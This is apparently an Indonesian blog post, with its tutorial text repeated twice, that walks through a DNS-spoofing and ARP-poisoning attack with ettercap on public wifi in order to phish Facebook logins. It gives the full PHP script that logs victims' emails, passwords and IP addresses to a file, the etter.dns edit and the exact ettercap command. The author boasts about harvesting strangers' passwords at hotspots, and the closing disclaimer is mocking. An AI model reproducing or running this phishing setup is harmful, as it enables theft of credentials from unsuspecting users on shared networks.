hey guys
apa kabar , yap xsan-lahci yang cool ini akan memberikan sebuah tutorial dns_spoof menggunakan ettercap
hmm dns_spoof? yap salah satu teknik MITM atau Man In The Middle Attack ini sangatlah saya gemari jika berada di hotspot area wakakka sebelum melakukan dns_spoof tentunya kita harus melakukan sebuah teknik arp poisoning atau peracunan jaringan , dns_spoofing ini bisa di katakan sebuah penyesatan , kali ini saya melakukan sebuah penyesatan pada jaringan wifi, hotspot area yang tidak terlalu secure tentu masih bisa di lakukan arp poisoning , dns spoofing sampai sniffing
seperti inilah kronologi sebuah dns_spoof yang di kombinasikan dengan arp poisoning

yap saya jelaskan sedikit, attacker melakukan peracunan jaringan pada gateway, sehingga korban yang seharusnya login pada server tujuan disini adalah facebook.com , malah masuk pada fakelogin attacker yg sudah di siapkan. ya jadi attacker ada di tengah antara korban dan gateway yg telah di racuni.
langsung aja deh pertama buka sebuah halaman login yang akan anda jadikan fakelogin/phising
disini saya menggunakan facebook,save di /var/www/ dengan nama index.html
lalu buka console dan edit pada bagian action perhatikan gambar di bawah ini
root@xsan-lahci :~# geany /var/www/index.html

bagi yang belum menginstall geany bisa langsung gunakan perintah
apt-get install geany
oke perhatikan kolom di atas disitu kita mencari tulisan action jika sudah ketemu langsung saja ganti isinya dengan tulisan seperti gambar di atas yaitu post.php yap agar ketika si korban login maka catatan passwordnya akan terekam pada logs.txt yang ada di post.php
save dulu ya tentunya isi codingan post.php dibawah ini
save dengan nama post.php dan di simpan di /var/www
next kedua edit isi dari etter.dns seperti berikut ini
gunakan editor kesukaan anda,disini saya menggunakan nano
root@xsan-lahci :~# nano /usr/local/share/ettercap/etter.dns

perhatikan gambar di atas, ada tulisan facebook.com yap saya menggunakan fakelogin facebook dan perhatikan no ip tersebut haha jangan lupa isikan dengan ip anda
ok langsung save and exit
dan jalankan apache2 anda seperti ini
root@xsan-lahci:~# /etc/init.d/apache2 start
langsung deh ente jalanin ettercapnya dengan perintah
ettercap -T -q -i (interface) -P dns_spoof (plugin dns_spoofing) -M ARP (arp poisoning) // // ( peracunan 1 jaringan)
root@xsan-lahci :~# ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
saya menggunakan wlan0 karena memanfaatkan wifi kalo pake kabel lan eth0 kalo pake modem usb ya gabisa lah wakakak

eh dapet nih coy password fb hahaha lumayan buat nambah donasi like fanpage gua wakakak facebook.com/XsanLahci eeh ga sampe situ aja , coba perhatikan gambar di atas kolom 1 ada tulisan dns_spoof: [www.facebook.com spoofed to bla bla keterangan itu berarti ada orang yang lagi cb akses fb hahaha bener kan ga lama nongol tuh dibawahya USER : sebut saja bunga dengan password alaynya yg tentu percuma mau di bikin password alay gmn juga tetep aja terbaca jelas kalo pake teknik dns_spoofing ini hahahaha
eeeh dapet lagi pemirsa semua terekan dengan indah di log.txt gua nih gambarnya bro

oke semua tutorial ini harap digunakan dengan bijaksana jangan coba coba untuk melakukan hal jahat kecuali like fanpage fb gua wakakakak
note : TS tidak bertanggung jawab atas kegiatan jahat yg diperaktekan user akibat membaca tutorial ini hahahaha

hmm dns_spoof? yap salah satu teknik MITM atau Man In The Middle Attack ini sangatlah saya gemari jika berada di hotspot area wakakka sebelum melakukan dns_spoof tentunya kita harus melakukan sebuah teknik arp poisoning atau peracunan jaringan , dns_spoofing ini bisa di katakan sebuah penyesatan , kali ini saya melakukan sebuah penyesatan pada jaringan wifi, hotspot area yang tidak terlalu secure tentu masih bisa di lakukan arp poisoning , dns spoofing sampai sniffing
seperti inilah kronologi sebuah dns_spoof yang di kombinasikan dengan arp poisoning

yap saya jelaskan sedikit, attacker melakukan peracunan jaringan pada gateway, sehingga korban yang seharusnya login pada server tujuan disini adalah facebook.com , malah masuk pada fakelogin attacker yg sudah di siapkan. ya jadi attacker ada di tengah antara korban dan gateway yg telah di racuni.
langsung aja deh pertama buka sebuah halaman login yang akan anda jadikan fakelogin/phising
disini saya menggunakan facebook,save di /var/www/ dengan nama index.html
lalu buka console dan edit pada bagian action perhatikan gambar di bawah ini
root@xsan-lahci :~# geany /var/www/index.html

bagi yang belum menginstall geany bisa langsung gunakan perintah
apt-get install geany
oke perhatikan kolom di atas disitu kita mencari tulisan action jika sudah ketemu langsung saja ganti isinya dengan tulisan seperti gambar di atas yaitu post.php yap agar ketika si korban login maka catatan passwordnya akan terekam pada logs.txt yang ada di post.php
save dulu ya tentunya isi codingan post.php dibawah ini
Code: (Select All)
<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
// -->
</script>";
?>
save dengan nama post.php dan di simpan di /var/www
next kedua edit isi dari etter.dns seperti berikut ini
gunakan editor kesukaan anda,disini saya menggunakan nano
root@xsan-lahci :~# nano /usr/local/share/ettercap/etter.dns

perhatikan gambar di atas, ada tulisan facebook.com yap saya menggunakan fakelogin facebook dan perhatikan no ip tersebut haha jangan lupa isikan dengan ip anda
ok langsung save and exit
dan jalankan apache2 anda seperti ini
root@xsan-lahci:~# /etc/init.d/apache2 start
langsung deh ente jalanin ettercapnya dengan perintah
ettercap -T -q -i (interface) -P dns_spoof (plugin dns_spoofing) -M ARP (arp poisoning) // // ( peracunan 1 jaringan)
root@xsan-lahci :~# ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
saya menggunakan wlan0 karena memanfaatkan wifi kalo pake kabel lan eth0 kalo pake modem usb ya gabisa lah wakakak

eh dapet nih coy password fb hahaha lumayan buat nambah donasi like fanpage gua wakakak facebook.com/XsanLahci eeh ga sampe situ aja , coba perhatikan gambar di atas kolom 1 ada tulisan dns_spoof: [www.facebook.com spoofed to bla bla keterangan itu berarti ada orang yang lagi cb akses fb hahaha bener kan ga lama nongol tuh dibawahya USER : sebut saja bunga dengan password alaynya yg tentu percuma mau di bikin password alay gmn juga tetep aja terbaca jelas kalo pake teknik dns_spoofing ini hahahaha
eeeh dapet lagi pemirsa semua terekan dengan indah di log.txt gua nih gambarnya bro

oke semua tutorial ini harap digunakan dengan bijaksana jangan coba coba untuk melakukan hal jahat kecuali like fanpage fb gua wakakakak
note : TS tidak bertanggung jawab atas kegiatan jahat yg diperaktekan user akibat membaca tutorial ini hahahaha
Tidak ada komentar:
Posting Komentar